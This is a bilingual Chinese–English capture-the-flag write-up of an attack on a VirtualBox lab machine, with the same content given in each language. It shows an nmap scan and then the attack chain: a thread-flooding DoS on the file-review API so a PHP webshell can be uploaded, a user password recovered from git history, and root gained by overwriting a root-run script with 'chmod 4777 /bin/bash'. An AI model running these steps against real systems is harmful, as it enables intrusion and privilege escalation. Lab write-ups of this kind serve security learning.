本文记录了一次靶机渗透实战。攻击者首先对3000端口的文件审核API发起DoS攻击使其瘫痪,从而绕过80端口的格式限制,成功上传PHP Webshell获取初始权限。接着在 /opt 目录发现Git信息泄露,利用 git show 找回了历史提交中隐藏的用户 tuf 的登录密码。最后,通过信息收集发现 root 进程在后台运行 /home/tuf/app.py,攻击者覆写该脚本,注入为 /bin/bash 赋予SUID权限的恶意代码,成功提权至 root。 This article documents a real-world penetration test on a target machine. The attacker first launched a DoS attack on the file audit API on port 3000 to disable it, thereby bypassing the format restrictions on port 80. This allowed a successful upload of a PHP Webshell to gain initial access. Next, Git information leakage was discovered in the /opt directory. By using `git show`, the attacker retrieved the hidden login password for user `tuf` from a historical commit. Finally, through information gathering, it was found that a root process was running `/home/tuf/app.py` in the background. The attacker overwrote this script, injecting malicious code to grant SUID permissions to `/bin/bash`, successfully escalating privileges to root.

信息收集

# Nmap 7.95 scan initiated Wed Dec 24 02:48:02 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 192.168.110.98
Nmap scan report for Kuai.lan (192.168.110.98)
Host is up (0.00046s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Maze\xE4\xB8\x8A\xE4\xBC\xA0
|_http-server-header: Apache/2.4.62 (Debian)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
3000/tcp open  http    Werkzeug httpd 3.1.4 (Python 3.9.2)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/3.1.4 Python/3.9.2
| http-methods:
|_  Supported Methods: HEAD GET OPTIONS
MAC Address: 08:00:27:04:C1:49 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Uptime guess: 9.769 days (since Sun Dec 14 08:21:29 2025)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 24 02:48:16 2025 -- 1 IP address (1 host up) scanned in 13.83 seconds

80端口是一个上传文件网址。上传的文件在http://192.168.110.98/uploads/

  • 状态: 正在将上传内容发送到审核服务器审核中
  • 只允许上传JPG图片文件

http://192.168.110.98:3000/api是一个使用api审核文件的端口

漏洞分析

对http://192.168.110.98:3000/api进行Dos攻击使其瘫痪

上传php文件即可

利用

gobuster dir --url http://192.168.110.98:3000/ --threads 3000 --wordlist /usr/share/wordlists/rockyou.txt后台挂着

上传webshell即可进入shell

www-data@Kuai:/opt$ ls -la
total 16
drwxr-xr-x  3 root root 4096 Dec 23 05:12 .
drwxr-xr-x 18 root root 4096 Mar 18  2025 ..
drwxr-xr-x  8 root root 4096 Dec 23 05:13 .git
-rw-r--r--  1 root root  308 Dec 23 05:12 app.py

git泄露

www-data@Kuai:/opt$ git log
fatal: detected dubious ownership in repository at '/opt'
To add an exception for this directory, call:

	git config --global --add safe.directory /opt
www-data@Kuai:/opt$ git config --global --add safe.directory /opt
fatal: $HOME not set
www-data@Kuai:/opt$ export HOME=/tmp
www-data@Kuai:/opt$ git config --global --add safe.directory /opt
www-data@Kuai:/opt$ git show
commit 937ff3b9ba793ab8e772dc5203f1170629cdfedf (HEAD -> master)
Author: Your Name <you@example.com>
Date:   Tue Dec 23 05:13:09 2025 -0500

    a

diff --git a/app.py b/app.py
index 612613f..24b48b9 100644
--- a/app.py
+++ b/app.py
@@ -2,7 +2,7 @@
 from flask import Flask, jsonify

 app = Flask(__name__)
-// tuf: Cbr5Cq1QBS2GHUOGuJrc
+// tuf:********

 @app.route('/')
 def index():

得到Cbr5Cq1QBS2GHUOGuJrc

权限提升

tuf@Kuai:~$ ps -ef
root         353     337  0 01:29 ?        00:00:00 /bin/sh -c python3 /home/tuf/app.py
nano a.py
# 输入import os;os.system('chmod 4777 /bin/bash')
rm app.py
mv a.py app.py

即可

Information Gathering

# Nmap 7.95 scan initiated Wed Dec 24 02:48:02 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 192.168.110.98
Nmap scan report for Kuai.lan (192.168.110.98)
Host is up (0.00046s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Maze\xE4\xB8\x8A\xE4\xBC\xA0
|_http-server-header: Apache/2.4.62 (Debian)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
3000/tcp open  http    Werkzeug httpd 3.1.4 (Python 3.9.2)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/3.1.4 Python/3.9.2
| http-methods:
|_  Supported Methods: HEAD GET OPTIONS
MAC Address: 08:00:27:04:C1:49 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Uptime guess: 9.769 days (since Sun Dec 14 08:21:29 2025)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 24 02:48:16 2025 -- 1 IP address (1 host up) scanned in 13.83 seconds

Port 80 is a file upload website. Uploaded files are at http://192.168.110.98/uploads/

  • Status: Upload content is being sent to the review server for review.
  • Only JPG image files are allowed to be uploaded.

http://192.168.110.98:3000/api is a port that uses an API to review files.

Vulnerability Analysis

Perform a DoS attack on http://192.168.110.98:3000/api to cripple it.

Simply upload a PHP file.

Exploitation

gobuster dir --url http://192.168.110.98:3000/ --threads 3000 --wordlist /usr/share/wordlists/rockyou.txt run it in the background.

Upload a webshell to get a shell.

www-data@Kuai:/opt$ ls -la
total 16
drwxr-xr-x  3 root root 4096 Dec 23 05:12 .
drwxr-xr-x 18 root root 4096 Mar 18  2025 ..
drwxr-xr-x  8 root root 4096 Dec 23 05:13 .git
-rw-r--r--  1 root root  308 Dec 23 05:12 app.py

git leak

www-data@Kuai:/opt$ git log
fatal: detected dubious ownership in repository at '/opt'
To add an exception for this directory, call:

	git config --global --add safe.directory /opt
www-data@Kuai:/opt$ git config --global --add safe.directory /opt
fatal: $HOME not set
www-data@Kuai:/opt$ export HOME=/tmp
www-data@Kuai:/opt$ git config --global --add safe.directory /opt
www-data@Kuai:/opt$ git show
commit 937ff3b9ba793ab8e772dc5203f1170629cdfedf (HEAD -> master)
Author: Your Name <you@example.com>
Date:   Tue Dec 23 05:13:09 2025 -0500

    a

diff --git a/app.py b/app.py
index 612613f..24b48b9 100644
--- a/app.py
+++ b/app.py
@@ -2,7 +2,7 @@
 from flask import Flask, jsonify

 app = Flask(__name__)
-// tuf: Cbr5Cq1QBS2GHUOGuJrc
+// tuf:********

 @app.route('/')
 def index():

Got Cbr5Cq1QBS2GHUOGuJrc.

Privilege Escalation

tuf@Kuai:~$ ps -ef
root         353     337  0 01:29 ?        00:00:00 /bin/sh -c python3 /home/tuf/app.py
nano a.py
# 输入import os;os.system('chmod 4777 /bin/bash')
rm app.py
mv a.py app.py

Then it's done.